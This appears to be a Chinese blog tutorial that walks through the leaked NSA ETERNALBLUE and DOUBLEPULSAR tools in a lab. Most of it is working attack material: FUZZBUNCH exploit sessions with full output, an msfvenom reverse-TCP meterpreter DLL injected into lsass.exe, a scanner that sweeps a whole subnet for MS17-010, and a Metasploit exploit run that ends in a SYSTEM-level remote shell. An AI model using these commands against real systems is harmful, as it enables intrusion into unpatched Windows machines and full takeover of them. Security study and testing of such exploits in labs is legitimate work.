NSA工具包利用

在4月14日下午5点shadowbroker公布了去年从方程式组织窃取的工具包

本次被公开的工具包大小为117.9MB,包含23个黑客工具。

解密后的工具包:

方程式ETERNALBLUE复现

测试环境

攻击机:

windows 7 Pro-64(192.168.1.4)
kali 2.0 (192.168.1.29)

Python环境:python-2.6.6
Python组件:pywin32(一定要使用32位的)
方程式ETERNALBLUE下载地址:ETERNALBLUE
靶机:window 7 Pro-64(192.168.1.25)

测试

综合各个信息


将26、27、28三行注释掉

再将72行注释掉。
然后将fb运行起来

如果出现遍历目录的错误,是因为缺少listeningposts目录,在同级下创建一个listeningposts目录。

开始进行配置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
[?] Default Target IP Address [] : 192.168.1.25
# 输入目标ip
[?] Default Callback IP Address [] : 192.168.1.4
#输入callback ip
[?] Use Redirection [yes] : no
#是否使用重定向
[?] Base Log directory [D:\logs] :
#日志文件的基础目录
[*] Checking D:\logs for projects
Index Project
----- -------
0 Create a New Project
[?] Project [0] : 0
#创建新项目。
[?] New Project Name : test
[?] Set target log directory to 'D:\logs\test\z192.168.1.25'? [Yes] : yes
#是否设置目标ip对应的日志文件目录在默认的下面
[*] Initializing Global State
[+] Set TargetIp => 192.168.1.25
[+] Set CallbackIp => 192.168.1.4
[!] Redirection OFF
[+] Set LogDir => D:\logs\test\z192.168.1.25
[+] Set Project => test
fb >
#配置完成,进入fb命令行界面

使用use查看支持得插件模式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
fb > use
Plugin Category: Touch
======================
Name Version
---- -------
Architouch 1.0.0
Domaintouch 1.1.1
Eclipsedwingtouch 1.0.4
Educatedscholartouch 1.0.0
Emeraldthreadtouch 1.0.0
Erraticgophertouch 1.0.1
Esteemaudittouch 2.1.0
Explodingcantouch 1.2.1
Iistouch 1.2.2
Namedpipetouch 2.0.0
Printjobdelete 1.0.0
Printjoblist 1.0.0
Rpctouch 2.1.0
Smbtouch 1.1.1
Webadmintouch 1.0.1
Worldclienttouch 1.0.1
Plugin Category: ImplantConfig
==============================
Name Version
---- -------
Darkpulsar 1.1.0
Mofconfig 1.0.0
Plugin Category: Exploit
========================
Name Version
---- -------
Easybee 1.0.1
Easypi 3.1.0
Eclipsedwing 1.5.2 MS08-67漏洞利用工具
Educatedscholar 1.0.0 MS09-050漏洞利用工具
Emeraldthread 3.0.0 MB和 Netbios 漏洞利用工具,使用445端口和 139端口
Emphasismine 3.4.0 通过SMTP漏洞攻击,默认端口25
Englishmansdentist 1.2.0 通过SMTP漏洞攻击,默认端口25
Erraticgopher 1.0.1 通过RPC漏洞攻击,端口为445
Eskimoroll 1.1.1 通过kerberos漏洞进行攻击,默认攻击端口88
Esteemaudit 2.1.0 RDP漏洞利用工具,默认攻击端口为3389
Eternalromance 1.4.0 SMB 和 NBT漏洞利用工具,影响端口139和445
Eternalsynergy 1.0.1 SMB漏洞利用工具,默认端口 445
Ewokfrenzy 2.0.0
Explodingcan 2.0.2 IIS漏洞利用工具,只对Windows2003有影响
Zippybeer 1.0.2 SMTP漏洞利用工具,默认端口 445
Plugin Category: Payload
========================
Name Version
---- -------
Jobadd 1.1.1
Jobdelete 1.1.1
Joblist 1.1.1
Pcdlllauncher 2.3.1
Processlist 1.1.1
Regdelete 1.1.1
Regenum 1.1.1
Regread 1.1.1
Regwrite 1.1.1
Rpcproxy 1.0.1
Smbdelete 1.1.1
Smblist 1.1.1
Smbread 1.1.1
Smbwrite 1.1.1
Plugin Category: Special
========================
Name Version
---- -------
Eternalblue 2.2.0
Eternalchampion 2.0.0

选择Eternalblue插件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.1.25
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.1.25
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
#是否确认可用参数,保持默认
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.
[?] NetworkTimeout [60] :
#设置超时时间,根据自身网络环境设置,时间长的就多设一些
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.1.25] :
#输入目标ip
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
#输入目标端口
[*] VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.
[?] VerifyTarget [True] :
#确认目标信息
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
#确认后台是否安装
[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.
[?] MaxExploitAttempts [3] :
#设置最大尝试次数
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
#设置buffer,保持默认即可
[*] Target :: Operating System, Service Pack, and Architecture of target OS
0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] : 1
#根据目标指纹而确定
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
#设置攻击模式
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] : yes
#是否确认使用本地的fuzzbunch插件,默认即可
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.1.25] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.1.25:445
#确认目标信息
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.1.25
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
#确认执行插件
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor not installed, game on.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (28 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
0x00000010 73 69 6f 6e 61 6c 20 37 36 30 30 00 sional 7600.
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending SMBv2 buffers
.............DONE.
[+] Sending large SMBv1 buffer..DONE.
[+] Sending final SMBv2 buffers......DONE.
[+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending egg to corrupted connection.
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
fb Special (Eternalblue) >

生成dll

使用攻击机2 kali的msfvenom 生成一下dll劫持文件, 这里使用的是reverse_tcp的paylaod 可以根据网络情况采用其他payload

1
2
3
4
5
6
root@RcoIl:~/桌面# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.29 LPORT=1024 -f dll > /root/桌面/test.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 5120 bytes

启动msfconsole进行监听。

1
2
3
4
5
6
7
8
9
10
11
msf > use exploit/multi/handler
msf exploit(handler) > set lhost 192.168.1.29
lhost => 192.168.1.29
msf exploit(handler) > set lport 1024
lport => 1024
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.1.29:1024
[*] Starting the payload handler...

使用doubelpulsar插件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
fb Special (Eternalblue) > use doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.1.25
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.1.25
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1
for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.1.25] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] : 1
[+] Set Architecture => x64
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on d
isk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [0] : 2
[+] Set Function => RunDLL
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : E:\test.dll
[+] Set DllPayload => E:\test.dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[*] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :
[*] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.1.25] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.1.25:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.1.25
TargetPort 445
DllPayload E:\test.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0x6CDC31C
9
SMB Connection string is: Windows 7 Professional 7600
Target OS is: 7 x64
Target SP is: 0
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded

反弹shell成功。

SMB漏洞批量检测

扫描脚本的下载和加载

1
2
root@kali:~# cd /usr/share/metasploit-framework/modules/auxiliary/scanner/smb
root@kali:/usr/share/metasploit-framework/modules/auxiliary/scanner/smb# wget https://www.exploit-db.com/download/41891 -O smb_ms_17_010.rb

漏洞扫描的使用方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
msf > use auxiliary/scanner/smb/smb_ms_17_010
msf auxiliary(smb_ms_17_010) > set RHOSTS 192.168.2.1-255
RHOSTS => 192.168.2.1-255
msf auxiliary(smb_ms_17_010) > set THREADS 10
THREADS => 10
msf auxiliary(smb_ms_17_010) > run
[*] Scanned 27 of 255 hosts (10% complete)
[*] Scanned 51 of 255 hosts (20% complete)
[*] Scanned 77 of 255 hosts (30% complete)
[*] 192.168.2.103:445 - Connected to \\192.168.2.103\IPC$ with TID = 2048
[*] 192.168.2.103:445 - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[!] 192.168.2.103:445 - Host is likely VULNERABLE to MS17-010!
[*] Scanned 103 of 255 hosts (40% complete)
[*] Scanned 131 of 255 hosts (51% complete)
[*] Scanned 153 of 255 hosts (60% complete)
[*] Scanned 179 of 255 hosts (70% complete)
[*] Scanned 205 of 255 hosts (80% complete)
[*] Scanned 230 of 255 hosts (90% complete)
[*] Scanned 255 of 255 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(smb_ms_17_010) >

将得到的结果进行验证

如果不想使用上面的方法进行验证,那也可以使用MSF直接验证

smb命令执行msf利用过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
msf > use exploit/windows/smb/ms17-010
msf exploit(ms17-010) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17-010) > set rhost 192.168.2.103
rhost => 192.168.2.103
msf exploit(ms17-010) > set lhost 192.168.2.105
lhost => 192.168.2.105
msf exploit(ms17-010) > show options
Module options (exploit/windows/smb/ms17-010):
Name Current Setting Required Description
---- --------------- -------- -----------
DOUBLEPULSARPATH //usr/share/metasploit-framework/modules/exploits/windows/smb/deps yes Path directory of Doublepulsar
ETERNALBLUEPATH //usr/share/metasploit-framework/modules/exploits/windows/smb/deps/ yes Path directory of Eternalblue
PROCESSINJECT lsass.exe yes Name of process to inject into (Change to lsass.exe for x64)
RHOST 192.168.2.103 yes The target address
RPORT 445 yes The SMB service port (TCP)
TARGETARCHITECTURE x86 yes Target Architecture (Accepted: x86, x64)
WINEPATH /root/.wine/drive_c/ yes WINE drive_c path
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.2.105 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
8 Windows Server 2008 R2 (x86) (x64)
msf exploit(ms17-010) > set TARGETARCHITECTURE x64
TARGETARCHITECTURE => x64
msf exploit(ms17-010) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Windows XP (all services pack) (x86) (x64)
2 Windows Server 2003 SP0 (x86)
3 Windows Server 2003 SP1/SP2 (x86)
4 Windows Server 2003 (x64)
5 Windows Vista (x86)
6 Windows Vista (x64)
7 Windows Server 2008 (x86)
8 Windows Server 2008 R2 (x86) (x64)
9 Windows 7 (all services pack) (x86) (x64)
msf exploit(ms17-010) > set targets 9
targets => 9
msf exploit(ms17-010) > exploit
[*] Started reverse TCP handler on 192.168.2.105:4444
[*] 192.168.2.103:445 - Generating Eternalblue XML data
[*] 192.168.2.103:445 - Generating Doublepulsar XML data
[*] 192.168.2.103:445 - Generating payload DLL for Doublepulsar
[*] 192.168.2.103:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.2.103:445 - Launching Eternalblue...
[+] 192.168.2.103:445 - Backdoor is already installed
[*] 192.168.2.103:445 - Launching Doublepulsar...
[*] Sending stage (1189423 bytes) to 192.168.2.103
[*] Meterpreter session 1 opened (192.168.2.105:4444 -> 192.168.2.103:62662) at 2017-04-29 15:43:03 +0800
[+] 192.168.2.103:445 - Remote code executed... 3... 2... 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : RCOIL-PC
OS : Windows 7 (Build 7600).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >

参考:Explotando CVE-2017-010 con Eternalblue y Doublepulsar desde Metasploit

后续

http://www.freebuf.com/?s=NSA

!坚持技术分享,您的支持将鼓励我继续创作!